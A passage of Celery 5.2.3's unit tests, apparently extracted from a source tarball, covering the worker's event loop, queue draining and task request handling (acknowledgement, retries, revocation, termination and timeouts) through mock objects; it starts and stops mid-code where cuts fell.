test_timeout_ignored(self): x = X(self.app) x.timeout_then_error(x.connection.drain_events) with pytest.raises(socket.error): synloop(*x.args) assert x.connection.drain_events.call_count == 2 def test_updates_qos_when_changed(self): x = X(self.app) x.qos.prev = 2 x.qos.value = 2 x.timeout_then_error(x.connection.drain_events) with pytest.raises(socket.error): synloop(*x.args) x.qos.update.assert_not_called() x.qos.value = 4 x.timeout_then_error(x.connection.drain_events) with pytest.raises(socket.error): synloop(*x.args) x.qos.update.assert_called_with() def test_ignores_socket_errors_when_closed(self): x = X(self.app) x.close_then_error(x.connection.drain_events) assert synloop(*x.args) is None def test_no_connection(self): x = X(self.app) x.connection = None x.hub.timer.call_repeatedly = Mock( name='x.hub.timer.call_repeatedly()' ) x.blueprint.state = CLOSE synloop(*x.args) x.hub.timer.call_repeatedly.assert_not_called() def test_heartbeat_error(self): x = X(self.app, heartbeat=10) x.obj.pool.is_green = True def heartbeat_check(rate): raise RuntimeError('Heartbeat error') def call_repeatedly(rate, fn, args): fn(*args) x.connection.heartbeat_check = Mock( name='heartbeat_check', side_effect=heartbeat_check ) x.obj.timer.call_repeatedly = call_repeatedly with pytest.raises(RuntimeError): synloop(*x.args) def test_no_heartbeat_support(self): x = X(self.app) x.connection.supports_heartbeats = False x.obj.pool.is_green = True x.obj.timer.call_repeatedly = Mock( name='x.obj.timer.call_repeatedly()' ) def drain_events(timeout): x.blueprint.state = CLOSE x.connection.drain_events.side_effect = drain_events synloop(*x.args) x.obj.timer.call_repeatedly.assert_not_called() class test_quick_drain: def setup(self): self.connection = Mock(name='connection') def test_drain(self): _quick_drain(self.connection, timeout=33.3) self.connection.drain_events.assert_called_with(timeout=33.3) def test_drain_error(self): exc = KeyError() exc.errno = 313 self.connection.drain_events.side_effect = exc with pytest.raises(KeyError): _quick_drain(self.connection, timeout=33.3) def test_drain_error_EAGAIN(self): exc = KeyError() exc.errno = errno.EAGAIN self.connection.drain_events.side_effect = exc _quick_drain(self.connection, timeout=33.3) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/t/unit/worker/test_request.py0000664000175000017500000013377400000000000020550 0ustar00asifasif00000000000000import numbers import os import signal import socket from datetime import datetime, timedelta from time import monotonic, time from unittest.mock import Mock, patch import pytest from billiard.einfo import ExceptionInfo from kombu.utils.encoding import from_utf8, safe_repr, safe_str from kombu.utils.uuid import uuid from celery import states from celery.app.trace import (TraceInfo, build_tracer, fast_trace_task, mro_lookup, reset_worker_optimizations, setup_worker_optimizations, trace_task, trace_task_ret) from celery.backends.base import BaseDictBackend from celery.exceptions import (Ignore, InvalidTaskError, Reject, Retry, TaskRevokedError, Terminated, WorkerLostError) from celery.signals import task_failure, task_retry, task_revoked from celery.worker import request as module from celery.worker import strategy from celery.worker.request import Request, create_request_cls from celery.worker.request import logger as req_logger from celery.worker.state import revoked class RequestCase: def setup(self): self.app.conf.result_serializer = 'pickle' @self.app.task(shared=False) def add(x, y, **kw_): return x + y self.add = add @self.app.task(shared=False) def mytask(i, **kwargs): return i ** i self.mytask = mytask @self.app.task(shared=False) def mytask_raising(i): raise KeyError(i) self.mytask_raising = mytask_raising def xRequest(self, name=None, id=None, args=None, kwargs=None, on_ack=None, on_reject=None, Request=Request, **head): args = [1] if args is None else args kwargs = {'f': 'x'} if kwargs is None else kwargs on_ack = on_ack or Mock(name='on_ack') on_reject = on_reject or Mock(name='on_reject') message = self.TaskMessage( name or self.mytask.name, id, args=args, kwargs=kwargs, **head ) return Request(message, app=self.app, on_ack=on_ack, on_reject=on_reject) class test_mro_lookup: def test_order(self): class A: pass class B(A): pass class C(B): pass class D(C): @classmethod def mro(cls): return () A.x = 10 assert mro_lookup(C, 'x') == A assert mro_lookup(C, 'x', stop={A}) is None B.x = 10 assert mro_lookup(C, 'x') == B C.x = 10 assert mro_lookup(C, 'x') == C assert mro_lookup(D, 'x') is None def jail(app, task_id, name, request_opts, args, kwargs): request = {'id': task_id} request.update(request_opts) task = app.tasks[name] task.__trace__ = None # rebuild return trace_task( task, task_id, args, kwargs, request=request, eager=False, app=app, ).retval class test_Retry: def test_retry_semipredicate(self): try: raise Exception('foo') except Exception as exc: ret = Retry('Retrying task', exc) assert ret.exc == exc class test_trace_task(RequestCase): def test_process_cleanup_fails(self, patching): _logger = patching('celery.app.trace.logger') self.mytask.backend = Mock() self.mytask.backend.process_cleanup = Mock(side_effect=KeyError()) tid = uuid() ret = jail(self.app, tid, self.mytask.name, {}, [2], {}) assert ret == 4 self.mytask.backend.mark_as_done.assert_called() assert 'Process cleanup failed' in _logger.error.call_args[0][0] def test_process_cleanup_BaseException(self): self.mytask.backend = Mock() self.mytask.backend.process_cleanup = Mock(side_effect=SystemExit()) with pytest.raises(SystemExit): jail(self.app, uuid(), self.mytask.name, {}, [2], {}) def test_execute_jail_success(self): ret = jail(self.app, uuid(), self.mytask.name, {}, [2], {}) assert ret == 4 def test_marked_as_started(self): _started = [] def store_result(tid, meta, state, **kwargs): if state == states.STARTED: _started.append(tid) self.mytask.backend.store_result = Mock(name='store_result') self.mytask.backend.store_result.side_effect = store_result self.mytask.track_started = True tid = uuid() jail(self.app, tid, self.mytask.name, {}, [2], {}) assert tid in _started self.mytask.ignore_result = True tid = uuid() jail(self.app, tid, self.mytask.name, {}, [2], {}) assert tid not in _started def test_execute_jail_failure(self): ret = jail( self.app, uuid(), self.mytask_raising.name, {}, [4], {}, ) assert isinstance(ret, ExceptionInfo) assert ret.exception.args == (4,) def test_execute_task_ignore_result(self): @self.app.task(shared=False, ignore_result=True) def ignores_result(i): return i ** i task_id = uuid() ret = jail(self.app, task_id, ignores_result.name, {}, [4], {}) assert ret == 256 assert not self.app.AsyncResult(task_id).ready() def test_execute_request_ignore_result(self): @self.app.task(shared=False) def ignores_result(i): return i ** i task_id = uuid() ret = jail( self.app, task_id, ignores_result.name, {'ignore_result': True}, [4], {} ) assert ret == 256 assert not self.app.AsyncResult(task_id).ready() class test_Request(RequestCase): def get_request(self, sig, Request=Request, exclude_headers=None, **kwargs): msg = self.task_message_from_sig(self.app, sig) headers = None if exclude_headers: headers = msg.headers for header in exclude_headers: headers.pop(header) return Request( msg, on_ack=Mock(name='on_ack'), on_reject=Mock(name='on_reject'), eventer=Mock(name='eventer'), app=self.app, connection_errors=(socket.error,), task=sig.type, headers=headers, **kwargs ) def test_shadow(self): assert self.get_request( self.add.s(2, 2).set(shadow='fooxyz')).name == 'fooxyz' def test_args(self): args = (2, 2) assert self.get_request( self.add.s(*args)).args == args def test_kwargs(self): kwargs = {'1': '2', '3': '4'} assert self.get_request( self.add.s(**kwargs)).kwargs == kwargs def test_info_function(self): import random import string kwargs = {} for i in range(0, 2): kwargs[str(i)] = ''.join( random.choice(string.ascii_lowercase) for i in range(1000)) assert self.get_request( self.add.s(**kwargs)).info(safe=True).get( 'kwargs') == '' # mock message doesn't populate kwargsrepr assert self.get_request( self.add.s(**kwargs)).info(safe=False).get('kwargs') == kwargs args = [] for i in range(0, 2): args.append(''.join( random.choice(string.ascii_lowercase) for i in range(1000))) assert list(self.get_request( self.add.s(*args)).info(safe=True).get( 'args')) == [] # mock message doesn't populate argsrepr assert list(self.get_request( self.add.s(*args)).info(safe=False).get('args')) == args def test_no_shadow_header(self): request = self.get_request(self.add.s(2, 2), exclude_headers=['shadow']) assert request.name == 't.unit.worker.test_request.add' def test_invalid_eta_raises_InvalidTaskError(self): with pytest.raises(InvalidTaskError): self.get_request(self.add.s(2, 2).set(eta='12345')) def test_invalid_expires_raises_InvalidTaskError(self): with pytest.raises(InvalidTaskError): self.get_request(self.add.s(2, 2).set(expires='12345')) def test_valid_expires_with_utc_makes_aware(self): with patch('celery.worker.request.maybe_make_aware') as mma: self.get_request(self.add.s(2, 2).set(expires=10), maybe_make_aware=mma) mma.assert_called() def test_maybe_expire_when_expires_is_None(self): req = self.get_request(self.add.s(2, 2)) assert not req.maybe_expire() def test_on_retry_acks_if_late(self): self.add.acks_late = True req = self.get_request(self.add.s(2, 2)) req.on_retry(Mock()) req.on_ack.assert_called_with(req_logger, req.connection_errors) def test_on_failure_Terminated(self): einfo = None try: raise Terminated('9') except Terminated: einfo = ExceptionInfo() assert einfo is not None req = self.get_request(self.add.s(2, 2)) req.on_failure(einfo) req.eventer.send.assert_called_with( 'task-revoked', uuid=req.id, terminated=True, signum='9', expired=False, ) def test_on_failure_propagates_MemoryError(self): einfo = None try: raise MemoryError() except MemoryError: einfo = ExceptionInfo(internal=True) assert einfo is not None req = self.get_request(self.add.s(2, 2)) with pytest.raises(MemoryError): req.on_failure(einfo) def test_on_failure_Ignore_acknowledges(self): einfo = None try: raise Ignore() except Ignore: einfo = ExceptionInfo(internal=True) assert einfo is not None req = self.get_request(self.add.s(2, 2)) req.on_failure(einfo) req.on_ack.assert_called_with(req_logger, req.connection_errors) def test_on_failure_Reject_rejects(self): einfo = None try: raise Reject() except Reject: einfo = ExceptionInfo(internal=True) assert einfo is not None req = self.get_request(self.add.s(2, 2)) req.on_failure(einfo) req.on_reject.assert_called_with( req_logger, req.connection_errors, False, ) def test_on_failure_Reject_rejects_with_requeue(self): einfo = None try: raise Reject(requeue=True) except Reject: einfo = ExceptionInfo(internal=True) assert einfo is not None req = self.get_request(self.add.s(2, 2)) req.on_failure(einfo) req.on_reject.assert_called_with( req_logger, req.connection_errors, True, ) def test_on_failure_WorkerLostError_rejects_with_requeue(self): try: raise WorkerLostError() except WorkerLostError: einfo = ExceptionInfo(internal=True) req = self.get_request(self.add.s(2, 2)) req.task.acks_late = True req.task.reject_on_worker_lost = True req.delivery_info['redelivered'] = False req.task.backend = Mock() req.on_failure(einfo) req.on_reject.assert_called_with( req_logger, req.connection_errors, True) req.task.backend.mark_as_failure.assert_not_called() def test_on_failure_WorkerLostError_redelivered_None(self): try: raise WorkerLostError() except WorkerLostError: einfo = ExceptionInfo(internal=True) req = self.get_request(self.add.s(2, 2)) req.task.acks_late = True req.task.reject_on_worker_lost = True req.delivery_info['redelivered'] = None req.task.backend = Mock() req.on_failure(einfo) req.on_reject.assert_called_with( req_logger, req.connection_errors, True) req.task.backend.mark_as_failure.assert_not_called() def test_on_failure_WorkerLostError_redelivered_True(self): try: raise WorkerLostError() except WorkerLostError: einfo = ExceptionInfo(internal=True) req = self.get_request(self.add.s(2, 2)) req.task.acks_late = False req.task.reject_on_worker_lost = True req.delivery_info['redelivered'] = True req.task.backend = Mock() with self.assert_signal_called( task_failure, sender=req.task, task_id=req.id, exception=einfo.exception, args=req.args, kwargs=req.kwargs, traceback=einfo.traceback, einfo=einfo ): req.on_failure(einfo) req.task.backend.mark_as_failure.assert_called_once_with(req.id, einfo.exception, request=req._context, store_result=True) def test_tzlocal_is_cached(self): req = self.get_request(self.add.s(2, 2)) req._tzlocal = 'foo' assert req.tzlocal == 'foo' def test_task_wrapper_repr(self): assert repr(self.xRequest()) def test_sets_store_errors(self): self.mytask.ignore_result = True job = self.xRequest() assert not job.store_errors self.mytask.store_errors_even_if_ignored = True job = self.xRequest() assert job.store_errors def test_send_event(self): job = self.xRequest() job.eventer = Mock(name='.eventer') job.send_event('task-frobulated') job.eventer.send.assert_called_with('task-frobulated', uuid=job.id) def test_send_events__disabled_at_task_level(self): job = self.xRequest() job.task.send_events = False job.eventer = Mock(name='.eventer') job.send_event('task-frobulated') job.eventer.send.assert_not_called() def test_on_retry(self): job = self.get_request(self.mytask.s(1, f='x')) job.eventer = Mock(name='.eventer') try: raise Retry('foo', KeyError('moofoobar')) except Retry: einfo = ExceptionInfo() job.on_failure(einfo) job.eventer.send.assert_called_with( 'task-retried', uuid=job.id, exception=safe_repr(einfo.exception.exc), traceback=safe_str(einfo.traceback), ) prev, module._does_info = module._does_info, False try: job.on_failure(einfo) finally: module._does_info = prev einfo.internal = True job.on_failure(einfo) def test_compat_properties(self): job = self.xRequest() assert job.task_id == job.id assert job.task_name == job.name job.task_id = 'ID' assert job.id == 'ID' job.task_name = 'NAME' assert job.name == 'NAME' def test_terminate__pool_ref(self): pool = Mock() signum = signal.SIGTERM job = self.get_request(self.mytask.s(1, f='x')) job._apply_result = Mock(name='_apply_result') with self.assert_signal_called( task_revoked, sender=job.task, request=job._context, terminated=True, expired=False, signum=signum): job.time_start = monotonic() job.worker_pid = 314 job.terminate(pool, signal='TERM') job._apply_result().terminate.assert_called_with(signum) job._apply_result = Mock(name='_apply_result2') job._apply_result.return_value = None job.terminate(pool, signal='TERM') def test_terminate__task_started(self): pool = Mock() signum = signal.SIGTERM job = self.get_request(self.mytask.s(1, f='x')) with self.assert_signal_called( task_revoked, sender=job.task, request=job._context, terminated=True, expired=False, signum=signum): job.time_start = monotonic() job.worker_pid = 313 job.terminate(pool, signal='TERM') pool.terminate_job.assert_called_with(job.worker_pid, signum) def test_cancel__pool_ref(self): pool = Mock() signum = signal.SIGTERM job = self.get_request(self.mytask.s(1, f='x')) job._apply_result = Mock(name='_apply_result') with self.assert_signal_called( task_retry, sender=job.task, request=job._context, einfo=None): job.time_start = monotonic() job.worker_pid = 314 job.cancel(pool, signal='TERM') job._apply_result().terminate.assert_called_with(signum) job._apply_result = Mock(name='_apply_result2') job._apply_result.return_value = None job.cancel(pool, signal='TERM') def test_terminate__task_reserved(self): pool = Mock() job = self.get_request(self.mytask.s(1, f='x')) job.time_start = None job.terminate(pool, signal='TERM') pool.terminate_job.assert_not_called() assert job._terminate_on_ack == (pool, 15) job.terminate(pool, signal='TERM') def test_cancel__task_started(self): pool = Mock() signum = signal.SIGTERM job = self.get_request(self.mytask.s(1, f='x')) job._apply_result = Mock(name='_apply_result') with self.assert_signal_called( task_retry, sender=job.task, request=job._context, einfo=None): job.time_start = monotonic() job.worker_pid = 314 job.cancel(pool, signal='TERM') job._apply_result().terminate.assert_called_with(signum) def test_cancel__task_reserved(self): pool = Mock() job = self.get_request(self.mytask.s(1, f='x')) job.time_start = None job.cancel(pool, signal='TERM') pool.terminate_job.assert_not_called() assert job._terminate_on_ack is None def test_revoked_expires_expired(self): job = self.get_request(self.mytask.s(1, f='x').set( expires=datetime.utcnow() - timedelta(days=1) )) with self.assert_signal_called( task_revoked, sender=job.task, request=job._context, terminated=False, expired=True, signum=None): job.revoked() assert job.id in revoked self.app.set_current() assert self.mytask.backend.get_status(job.id) == states.REVOKED def test_revoked_expires_not_expired(self): job = self.xRequest( expires=datetime.utcnow() + timedelta(days=1), ) job.revoked() assert job.id not in revoked assert self.mytask.backend.get_status(job.id) != states.REVOKED def test_revoked_expires_ignore_result(self): self.mytask.ignore_result = True job = self.xRequest( expires=datetime.utcnow() - timedelta(days=1), ) job.revoked() assert job.id in revoked assert self.mytask.backend.get_status(job.id) != states.REVOKED def test_already_revoked(self): job = self.xRequest() job._already_revoked = True assert job.revoked() def test_revoked(self): job = self.xRequest() with self.assert_signal_called( task_revoked, sender=job.task, request=job._context, terminated=False, expired=False, signum=None): revoked.add(job.id) assert job.revoked() assert job._already_revoked assert job.acknowledged def test_execute_does_not_execute_revoked(self): job = self.xRequest() revoked.add(job.id) job.execute() def test_execute_acks_late(self): self.mytask_raising.acks_late = True job = self.xRequest( name=self.mytask_raising.name, kwargs={}, ) job.execute() assert job.acknowledged job.execute() def test_execute_using_pool_does_not_execute_revoked(self): job = self.xRequest() revoked.add(job.id) with pytest.raises(TaskRevokedError): job.execute_using_pool(None) def test_on_accepted_acks_early(self): job = self.xRequest() job.on_accepted(pid=os.getpid(), time_accepted=monotonic()) assert job.acknowledged prev, module._does_debug = module._does_debug, False try: job.on_accepted(pid=os.getpid(), time_accepted=monotonic()) finally: module._does_debug = prev def test_on_accepted_acks_late(self): job = self.xRequest() self.mytask.acks_late = True job.on_accepted(pid=os.getpid(), time_accepted=monotonic()) assert not job.acknowledged def test_on_accepted_terminates(self): signum = signal.SIGTERM pool = Mock() job = self.xRequest() with self.assert_signal_called( task_revoked, sender=job.task, request=job._context, terminated=True, expired=False, signum=signum): job.terminate(pool, signal='TERM') assert not pool.terminate_job.call_count job.on_accepted(pid=314, time_accepted=monotonic()) pool.terminate_job.assert_called_with(314, signum) def test_on_accepted_time_start(self): job = self.xRequest() job.on_accepted(pid=os.getpid(), time_accepted=monotonic()) assert time() - job.time_start < 1 def test_on_success_acks_early(self): job = self.xRequest() job.time_start = 1 job.on_success((0, 42, 0.001)) prev, module._does_info = module._does_info, False try: job.on_success((0, 42, 0.001)) assert not job.acknowledged finally: module._does_info = prev def test_on_success_BaseException(self): job = self.xRequest() job.time_start = 1 with pytest.raises(SystemExit): try: raise SystemExit() except SystemExit: job.on_success((1, ExceptionInfo(), 0.01)) else: assert False def test_on_success_eventer(self): job = self.xRequest() job.time_start = 1 job.eventer = Mock() job.eventer.send = Mock() job.on_success((0, 42, 0.001)) job.eventer.send.assert_called() def test_on_success_when_failure(self): job = self.xRequest() job.time_start = 1 job.on_failure = Mock() try: raise KeyError('foo') except Exception: job.on_success((1, ExceptionInfo(), 0.001)) job.on_failure.assert_called() def test_on_success_acks_late(self): job = self.xRequest() job.time_start = 1 self.mytask.acks_late = True job.on_success((0, 42, 0.001)) assert job.acknowledged def test_on_failure_WorkerLostError(self): def get_ei(): try: raise WorkerLostError('do re mi') except WorkerLostError: return ExceptionInfo() job = self.xRequest() exc_info = get_ei() job.on_failure(exc_info) self.app.set_current() assert self.mytask.backend.get_status(job.id) == states.FAILURE self.mytask.ignore_result = True exc_info = get_ei() job = self.xRequest() job.on_failure(exc_info) assert self.mytask.backend.get_status(job.id) == states.PENDING def test_on_failure_acks_late_reject_on_worker_lost_enabled(self): try: raise WorkerLostError() except WorkerLostError: exc_info = ExceptionInfo() self.mytask.acks_late = True self.mytask.reject_on_worker_lost = True job = self.xRequest() job.delivery_info['redelivered'] = False job.on_failure(exc_info) assert self.mytask.backend.get_status(job.id) == states.PENDING job = self.xRequest() job.delivery_info['redelivered'] = True job.on_failure(exc_info) assert self.mytask.backend.get_status(job.id) == states.PENDING def test_on_failure_acks_late(self): job = self.xRequest() job.time_start = 1 self.mytask.acks_late = True try: raise KeyError('foo') except KeyError: exc_info = ExceptionInfo() job.on_failure(exc_info) assert job.acknowledged def test_on_failure_acks_on_failure_or_timeout_disabled_for_task(self): job = self.xRequest() job.time_start = 1 job._on_reject = Mock() self.mytask.acks_late = True self.mytask.acks_on_failure_or_timeout = False try: raise KeyError('foo') except KeyError: exc_info = ExceptionInfo() job.on_failure(exc_info) assert job.acknowledged is True job._on_reject.assert_called_with(req_logger, job.connection_errors, False) def test_on_failure_acks_on_failure_or_timeout_enabled_for_task(self): job = self.xRequest() job.time_start = 1 self.mytask.acks_late = True self.mytask.acks_on_failure_or_timeout = True try: raise KeyError('foo') except KeyError: exc_info = ExceptionInfo() job.on_failure(exc_info) assert job.acknowledged is True def test_on_failure_acks_on_failure_or_timeout_disabled(self): self.app.conf.acks_on_failure_or_timeout = False job = self.xRequest() job.time_start = 1 self.mytask.acks_late = True self.mytask.acks_on_failure_or_timeout = False try: raise KeyError('foo') except KeyError: exc_info = ExceptionInfo() job.on_failure(exc_info) assert job.acknowledged is True job._on_reject.assert_called_with(req_logger, job.connection_errors, False) self.app.conf.acks_on_failure_or_timeout = True def test_on_failure_acks_on_failure_or_timeout_enabled(self): self.app.conf.acks_on_failure_or_timeout = True job = self.xRequest() job.time_start = 1 self.mytask.acks_late = True try: raise KeyError('foo') except KeyError: exc_info = ExceptionInfo() job.on_failure(exc_info) assert job.acknowledged is True def test_on_failure_task_cancelled(self): job = self.xRequest() job.eventer = Mock() job.time_start = 1 job._already_cancelled = True try: raise Terminated() except Terminated: exc_info = ExceptionInfo() job.on_failure(exc_info) job.on_failure(exc_info) assert not job.eventer.send.called def test_from_message_invalid_kwargs(self): m = self.TaskMessage(self.mytask.name, args=(), kwargs='foo') req = Request(m, app=self.app) with pytest.raises(InvalidTaskError): raise req.execute().exception def test_on_hard_timeout_acks_late(self, patching): error = patching('celery.worker.request.error') job = self.xRequest() job.acknowledge = Mock(name='ack') job.task.acks_late = True job.on_timeout(soft=False, timeout=1337) assert 'Hard time limit' in error.call_args[0][0] assert self.mytask.backend.get_status(job.id) == states.FAILURE job.acknowledge.assert_called_with() job = self.xRequest() job.acknowledge = Mock(name='ack') job.task.acks_late = False job.on_timeout(soft=False, timeout=1335) job.acknowledge.assert_not_called() def test_on_hard_timeout_acks_on_failure_or_timeout(self, patching): error = patching('celery.worker.request.error') job = self.xRequest() job.acknowledge = Mock(name='ack') job.task.acks_late = True job.task.acks_on_failure_or_timeout = True job.on_timeout(soft=False, timeout=1337) assert 'Hard time limit' in error.call_args[0][0] assert self.mytask.backend.get_status(job.id) == states.FAILURE job.acknowledge.assert_called_with() job = self.xRequest() job.acknowledge = Mock(name='ack') job.task.acks_late = True job.task.acks_on_failure_or_timeout = False job.on_timeout(soft=False, timeout=1337) assert 'Hard time limit' in error.call_args[0][0] assert self.mytask.backend.get_status(job.id) == states.FAILURE job.acknowledge.assert_not_called() job = self.xRequest() job.acknowledge = Mock(name='ack') job.task.acks_late = False job.task.acks_on_failure_or_timeout = True job.on_timeout(soft=False, timeout=1335) job.acknowledge.assert_not_called() def test_on_soft_timeout(self, patching): warn = patching('celery.worker.request.warn') job = self.xRequest() job.acknowledge = Mock(name='ack') job.task.acks_late = True job.on_timeout(soft=True, timeout=1337) assert 'Soft time limit' in warn.call_args[0][0] assert self.mytask.backend.get_status(job.id) == states.PENDING job.acknowledge.assert_not_called() self.mytask.ignore_result = True job = self.xRequest() job.on_timeout(soft=True, timeout=1336) assert self.mytask.backend.get_status(job.id) == states.PENDING def test_fast_trace_task(self): assert self.app.use_fast_trace_task is False setup_worker_optimizations(self.app) assert self.app.use_fast_trace_task is True tid = uuid() message = self.TaskMessage(self.mytask.name, tid, args=[4]) assert len(message.payload) == 3 try: self.mytask.__trace__ = build_tracer( self.mytask.name, self.mytask, self.app.loader, 'test', app=self.app, ) failed, res, runtime = fast_trace_task( self.mytask.name, tid, message.headers, message.body, message.content_type, message.content_encoding) assert not failed assert res == repr(4 ** 4) assert runtime is not None assert isinstance(runtime, numbers.Real) finally: reset_worker_optimizations(self.app) assert self.app.use_fast_trace_task is False delattr(self.mytask, '__trace__') failed, res, runtime = trace_task_ret( self.mytask.name, tid, message.headers, message.body, message.content_type, message.content_encoding, app=self.app, ) assert not failed assert res == repr(4 ** 4) assert runtime is not None assert isinstance(runtime, numbers.Real) def test_trace_task_ret(self): self.mytask.__trace__ = build_tracer( self.mytask.name, self.mytask, self.app.loader, 'test', app=self.app, ) tid = uuid() message = self.TaskMessage(self.mytask.name, tid, args=[4]) _, R, _ = trace_task_ret( self.mytask.name, tid, message.headers, message.body, message.content_type, message.content_encoding, app=self.app, ) assert R == repr(4 ** 4) def test_trace_task_ret__no_trace(self): try: delattr(self.mytask, '__trace__') except AttributeError: pass tid = uuid() message = self.TaskMessage(self.mytask.name, tid, args=[4]) _, R, _ = trace_task_ret( self.mytask.name, tid, message.headers, message.body, message.content_type, message.content_encoding, app=self.app, ) assert R == repr(4 ** 4) def test_trace_catches_exception(self): @self.app.task(request=None, shared=False) def raising(): raise KeyError('baz') with pytest.warns(RuntimeWarning): res = trace_task(raising, uuid(), [], {}, app=self.app)[0] assert isinstance(res, ExceptionInfo) def test_worker_task_trace_handle_retry(self): tid = uuid() self.mytask.push_request(id=tid) try: raise ValueError('foo') except Exception as exc: try: raise Retry(str(exc), exc=exc) except Retry as exc: w = TraceInfo(states.RETRY, exc) w.handle_retry( self.mytask, self.mytask.request, store_errors=False, ) assert self.mytask.backend.get_status(tid) == states.PENDING w.handle_retry( self.mytask, self.mytask.request, store_errors=True, ) assert self.mytask.backend.get_status(tid) == states.RETRY finally: self.mytask.pop_request() def test_worker_task_trace_handle_failure(self): tid = uuid() self.mytask.push_request() try: self.mytask.request.id = tid try: raise ValueError('foo') except Exception as exc: w = TraceInfo(states.FAILURE, exc) w.handle_failure( self.mytask, self.mytask.request, store_errors=False, ) assert self.mytask.backend.get_status(tid) == states.PENDING w.handle_failure( self.mytask, self.mytask.request, store_errors=True, ) assert self.mytask.backend.get_status(tid) == states.FAILURE finally: self.mytask.pop_request() def test_from_message(self): us = 'æØåveéðƒeæ' tid = uuid() m = self.TaskMessage( self.mytask.name, tid, args=[2], kwargs={us: 'bar'}, ) job = Request(m, app=self.app) assert isinstance(job, Request) assert job.name == self.mytask.name assert job.id == tid assert job.message is m def test_from_message_empty_args(self): tid = uuid() m = self.TaskMessage(self.mytask.name, tid, args=[], kwargs={}) job = Request(m, app=self.app) assert isinstance(job, Request) def test_from_message_missing_required_fields(self): m = self.TaskMessage(self.mytask.name) m.headers.clear() with pytest.raises(KeyError): Request(m, app=self.app) def test_from_message_nonexistant_task(self): m = self.TaskMessage( 'cu.mytask.doesnotexist', args=[2], kwargs={'æØåveéðƒeæ': 'bar'}, ) with pytest.raises(KeyError): Request(m, app=self.app) def test_execute(self): tid = uuid() job = self.xRequest(id=tid, args=[4], kwargs={}) assert job.execute() == 256 meta = self.mytask.backend.get_task_meta(tid) assert meta['status'] == states.SUCCESS assert meta['result'] == 256 def test_execute_backend_error_acks_late(self): """direct call to execute should reject task in case of internal failure.""" tid = uuid() self.mytask.acks_late = True job = self.xRequest(id=tid, args=[4], kwargs={}) job._on_reject = Mock() job._on_ack = Mock() self.mytask.backend = BaseDictBackend(app=self.app) self.mytask.backend.mark_as_done = Mock() self.mytask.backend.mark_as_done.side_effect = Exception() self.mytask.backend.mark_as_failure = Mock() self.mytask.backend.mark_as_failure.side_effect = Exception() job.execute() assert job.acknowledged job._on_reject.assert_called_once() job._on_ack.assert_not_called() def test_execute_success_no_kwargs(self): @self.app.task # traverses coverage for decorator without parens def mytask_no_kwargs(i): return i ** i tid = uuid() job = self.xRequest( name=mytask_no_kwargs.name, id=tid, args=[4], kwargs={}, ) assert job.execute() == 256 meta = mytask_no_kwargs.backend.get_task_meta(tid) assert meta['result'] == 256 assert meta['status'] == states.SUCCESS def test_execute_ack(self): scratch = {'ACK': False} def on_ack(*args, **kwargs): scratch['ACK'] = True tid = uuid() job = self.xRequest(id=tid, args=[4], on_ack=on_ack) assert job.execute() == 256 meta = self.mytask.backend.get_task_meta(tid) assert scratch['ACK'] assert meta['result'] == 256 assert meta['status'] == states.SUCCESS def test_execute_fail(self): tid = uuid() job = self.xRequest( name=self.mytask_raising.name, id=tid, args=[4], kwargs={}, ) assert isinstance(job.execute(), ExceptionInfo) assert self.mytask_raising.backend.serializer == 'pickle' meta = self.mytask_raising.backend.get_task_meta(tid) assert meta['status'] == states.FAILURE assert isinstance(meta['result'], KeyError) def test_execute_using_pool(self): tid = uuid() job = self.xRequest(id=tid, args=[4]) p = Mock() job.execute_using_pool(p) p.apply_async.assert_called_once() trace = p.apply_async.call_args[0][0] assert trace == trace_task_ret args = p.apply_async.call_args[1]['args'] assert args[0] == self.mytask.name assert args[1] == tid assert args[2] == job.request_dict assert args[3] == job.message.body def test_execute_using_pool_fast_trace_task(self): self.app.use_fast_trace_task = True tid = uuid() job = self.xRequest(id=tid, args=[4]) p = Mock() job.execute_using_pool(p) p.apply_async.assert_called_once() trace = p.apply_async.call_args[0][0] assert trace == fast_trace_task args = p.apply_async.call_args[1]['args'] assert args[0] == self.mytask.name assert args[1] == tid assert args[2] == job.request_dict assert args[3] == job.message.body def _test_on_failure(self, exception, **kwargs): tid = uuid() job = self.xRequest(id=tid, args=[4]) job.send_event = Mock(name='send_event') job.task.backend.mark_as_failure = Mock(name='mark_as_failure') try: raise exception except type(exception): exc_info = ExceptionInfo() job.on_failure(exc_info, **kwargs) job.send_event.assert_called() return job def test_on_failure(self): self._test_on_failure(Exception('Inside unit tests')) def test_on_failure__unicode_exception(self): self._test_on_failure(Exception('Бобры атакуют')) def test_on_failure__utf8_exception(self): self._test_on_failure(Exception( from_utf8('Бобры атакуют'))) def test_on_failure__WorkerLostError(self): exc = WorkerLostError() job = self._test_on_failure(exc) job.task.backend.mark_as_failure.assert_called_with( job.id, exc, request=job._context, store_result=True, ) def test_on_failure__return_ok(self): self._test_on_failure(KeyError(), return_ok=True) def test_reject(self): job = self.xRequest(id=uuid()) job.on_reject = Mock(name='on_reject') job.reject(requeue=True) job.on_reject.assert_called_with( req_logger, job.connection_errors, True, ) assert job.acknowledged job.on_reject.reset_mock() job.reject(requeue=True) job.on_reject.assert_not_called() def test_group(self): gid = uuid() job = self.xRequest(id=uuid(), group=gid) assert job.group == gid def test_group_index(self): group_index = 42 job = self.xRequest(id=uuid(), group_index=group_index) assert job.group_index == group_index class test_create_request_class(RequestCase): def setup(self): self.task = Mock(name='task') self.pool = Mock(name='pool') self.eventer = Mock(name='eventer') super().setup() def create_request_cls(self, **kwargs): return create_request_cls( Request, self.task, self.pool, 'foo', self.eventer, app=self.app, **kwargs ) def zRequest(self, Request=None, revoked_tasks=None, ref=None, **kwargs): return self.xRequest( Request=Request or self.create_request_cls( ref=ref, revoked_tasks=revoked_tasks, ), **kwargs) def test_on_success(self): self.zRequest(id=uuid()).on_success((False, 'hey', 3.1222)) def test_on_success__SystemExit(self, errors=(SystemExit, KeyboardInterrupt)): for exc in errors: einfo = None try: raise exc() except exc: einfo = ExceptionInfo() with pytest.raises(exc): self.zRequest(id=uuid()).on_success((True, einfo, 1.0)) def test_on_success__calls_failure(self): job = self.zRequest(id=uuid()) einfo = Mock(name='einfo') job.on_failure = Mock(name='on_failure') job.on_success((True, einfo, 1.0)) job.on_failure.assert_called_with(einfo, return_ok=True) def test_on_success__acks_late_enabled(self): self.task.acks_late = True job = self.zRequest(id=uuid()) job.acknowledge = Mock(name='ack') job.on_success((False, 'foo', 1.0)) job.acknowledge.assert_called_with() def test_on_success__acks_late_disabled(self): self.task.acks_late = False job = self.zRequest(id=uuid()) job.acknowledge 